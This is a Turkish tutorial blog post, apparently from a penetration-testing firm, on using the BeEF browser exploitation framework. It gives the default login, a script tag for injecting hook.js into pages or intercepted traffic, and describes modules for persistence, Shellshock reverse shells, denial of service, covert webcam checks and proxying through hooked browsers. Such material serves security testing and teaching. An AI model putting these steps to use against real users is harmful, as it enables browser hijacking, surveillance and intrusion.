BeEF Kullanımı

BeEF Nedir?

BeEF, Browser Expoitation Framework’ün kısaltmasıdır. BeEF saldırgan tarafından hazırlanan hook.js dosyasının hedef tarayıcı üzerinde çalıştırılması durumunda tarayıcıya bağlanarak hem web sitesine hem de tarayıcıya sızma testlerinin yapılmasını sağlamaktadır.

Nasıl Kullanılır?

BeEF Kali Linux’ta hazır olarak bulunmaktadır. BeEF’i ekrandaki kısayolundan veya terminalden beef-xss yazarak çalıştırabilirsiniz. Uygulamayı çalıştırdığınızda tarayıcınızda açılacak olan login ekranında kullanıcı adı ve parola kısmına varsayılan olarak tanımlı olan beef/beef değerini girmeniz gerekmektedir. Kullanıcı adı, parola, kullanılan veritabanı ve eklentileri ayarlamak için Kali’de varsayılan olarak usr/share/beef-xss/ klasöründe bulunan config.yaml dosyasında değişiklik yapılması gerekmektedir.

BeEF FRAMEWORK

Uygulamaya giriş yaptıktan sonra bizi başlangıç ekranı karşılamaktadır. Bu sayfada BeEF’i denemek için hazırlanmış demo sayfalarına ulaşabilirsiniz. Ayrıca sayfada bulunan Hook Me! linkini sık kullanılanlar çubuğuna ekleyerek herhangi bir sayfada tıklamanız durumunda o sayfayı BeEF’e bağlayabilirsiniz. Kendi yazdığınız ya da Man in the Middle yaptığınız bir sayfaya BeEF’i eklemek isterseniz <script type=”text/javascript” src=”http://127.0.0.1:3000/hook.js”></script> satırını src kısmını BeEF’in çalıştığı IP’ye karşılık gelecek şekilde değiştirerek sayfanın HTML kodlarına ekleyebilirsiniz.

BeEF FRAMEWORK

Hedef tarayıcıyı BeEF’e bağlayarak Hooked Browser bölümünde üzerine tıkladığımızda karşımıza bağladığımız tarayıcı hakkında bilgiler bulunan Details sekmesi gelmektedir. Bu sekmenin yanında sırası ile tarayıcıda ne yapıldığını detaylı olarak gösteren Logs, tarayıcıya gönderilebilecek komutların olduğu Commands, tarayıcıyı proxy olarak kullanmak için Rider, tarayıcıda açık olan sayfada XSS testleri yapabilmek için XssRays, interaktif shell ile BeEF’i kontrol etmek için Ipec, ağ bilgilerini görüntülemek için Network ve bağlı tarayıcıların birbiriyle iletişimini sağlamak için WebRTC sekmeleri bulunmaktadır.

BeEF FRAMEWORK

Commands

Komutlar sekmesinde bulunan modüller ile bağlanılan tarayıcıya komutlar gönderebilmekteyiz. Bu modüllerden bazıları ile hedef sistemde kalıcılık sağlamak, hedef sistemin bulunduğu ağı taramak veya sisteme tam erişim sağlamak mümkün olabilmektedir. Kullanımı işe yarayabilecek bazı modüller aşağıdaki gibidir:

Persistence: Man-In-The-Browser

Bu modül ile kullanıcı bulunduğu sitede kaldığı sürece tarayıcı ile olan bağlantının aktif kalması sağlanmaktadır. Ancak kullanıcı adres çubuğundaki adresi değiştirirse bağlantı kopmaktadır.

Exploits: RFI Scanner

Bağlı sayfada Remote File Inclusion açıklarını test etmektedir.

Exploits: Shell Shock

Shell Shock açığını kullanarak tersine shell almayı denemektedir.

Network: DOSer

Sonsuz GET ve POST isteklerini hedef URL’ye yollayarak denial of service saldırısı yaptırmaktadır.

BeEF FRAMEWORK
Browser: Webcam Permission Check

Kullanıcıya belirtmeden kamera izninin verilip verilmediğini kontrol etmektedir. İznin verilmiş olması durumunda Webcam modülü ile kullanıcının görüntüsünü almak mümkün olmaktadır.

Rider

Rider sekmesinde hedef tarayıcıyı proxy olarak kullanmamızı ve tarayıcıda yönlendirmeler yapabilmemizi sağlayan eklenti bulunmaktadır. Bu eklenti ile hedef tarayıcıyı proxy olarak kullanmak için Hooked Browsers bölümündeki tarayıcıya sağ tıklayarak “Use as Proxy” seçeneğine tıklanmalıdır. Ardından kullanılan tarayıcının proxy ayarlarından 127.0.0.1 ip adresi ve 6789 portunu kullanarak proxyi kullanabilirsiniz. Forge Request sekmesinden bağlı tarayıcıdan istediğiniz sayfaya HTTP isteği yapılmasını sağlayabilirsiniz. Proxy ve Forge Request ile yapılan tüm istekler ve cevapları History sekmesinde listelenecektir.

BeEF FRAMEWORK

XssRays

XssRays sekmesinde hedef tarayıcının bulunduğu sayfada Xss zaafiyeti bulunup bulunmadığı kontrol edilebilmektedir. Bu eklentiyi XssRays sekmesinin Scan Config sekmesinden Start Scan butonu ile Hooked Browsers bölümünde üzerinden test yapmak istediğiniz adrese sağ tıklayarak Launch XssRays on Hooked Domain elemanını seçerek kullanabilirsiniz. Eklentinin tarayıcının bulunduğu sayfada XSS zafiyeti bulması durumunda bulunan zafiyet Logs sekmesinde listelenecektir.

Blog postu ile ilgili bir sorunuz varsa bizimle iletişime geçebilirsiniz.

Onur ERHAN

Size nasıl yardımcı olalım?

İhtiyacınız olan her an Prisma danışmanları yanı başınızda. Bizimle 7/24 iletişime geçebilirsiniz.


Sızma testi hizmetlerimizi incelediniz mi?